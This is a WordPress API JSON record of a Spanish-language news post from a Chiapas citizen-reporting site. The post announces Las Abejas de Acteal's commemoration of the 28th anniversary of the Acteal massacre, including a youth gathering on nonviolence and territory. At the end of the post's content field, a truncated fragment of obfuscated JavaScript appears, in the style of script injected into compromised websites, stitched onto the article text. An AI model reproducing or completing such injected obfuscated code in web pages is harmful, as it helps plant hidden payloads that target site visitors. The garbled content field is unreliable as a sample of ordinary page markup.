{"id":25791,"date":"2025-12-15T06:03:04","date_gmt":"2025-12-15T06:03:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25791"},"modified":"2025-12-15T06:03:05","modified_gmt":"2025-12-15T06:03:05","slug":"las-abejas-de-acteal-convocan-a-jornada-conmemorativa-por-el-28-aniversario-de-la-masacre","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25791","title":{"rendered":"Las Abejas de Acteal convocan a jornada conmemorativa por el 28 aniversario de la masacre"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000493401-1024x768.jpg\" alt=\"\" class=\"wp-image-25792\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000493401-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000493401-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000493401-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000493401.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<br>14 de diciembre del 2025. San Crist\u00f3bal de Las Casas.- En el marco del 28 aniversario de la masacre de Acteal, la organizaci\u00f3n anunci\u00f3 un programa de dos d\u00edas que se desarrollar\u00e1 los d\u00edas 21 y 22 de diciembre, con el objetivo de mantener viva la memoria, exigir justicia y fortalecer los procesos comunitarios desde una visi\u00f3n de paz y dignidad.<\/p>\n\n\n\n<p>Como parte central de la jornada, el 21 de diciembre se realizar\u00e1 un encuentro dirigido a j\u00f3venes de entre 15 y 25 a\u00f1os, en el que se abordar\u00e1n temas como la no violencia, la resistencia civil, la autonom\u00eda y la defensa de la tierra y el territorio. Esta actividad contar\u00e1 con el acompa\u00f1amiento del Centro de Derechos Humanos Fray Bartolom\u00e9 de Las Casas (Frayba).<\/p>\n\n\n\n<p>A trav\u00e9s de un pronunciamiento p\u00fablico, Las Abejas convocaron a la juventud a participar, destacando su papel como portadora de esperanza frente a los escenarios de violencia que enfrentan los pueblos originarios, organizaciones y comunidades, reiterando la invitaci\u00f3n a reunirse en Acteal como un acto de memoria y compromiso colectivo.<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal14 de diciembre del 2025. San Crist\u00f3bal de Las Casas.- En el marco del 28 aniversario de la masacre de Acteal, la organizaci\u00f3n anunci\u00f3 un programa de dos d\u00edas que se desarrollar\u00e1 los d\u00edas 21 y 22 de diciembre, con el objetivo de mantener viva la memoria, exigir justicia y fortalecer los procesos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25792,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-25791","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25791","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25791"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25791\/revisions"}],"predecessor-version":[{"id":25793,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25791\/revisions\/25793"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25792"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25791"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25791"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25791"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}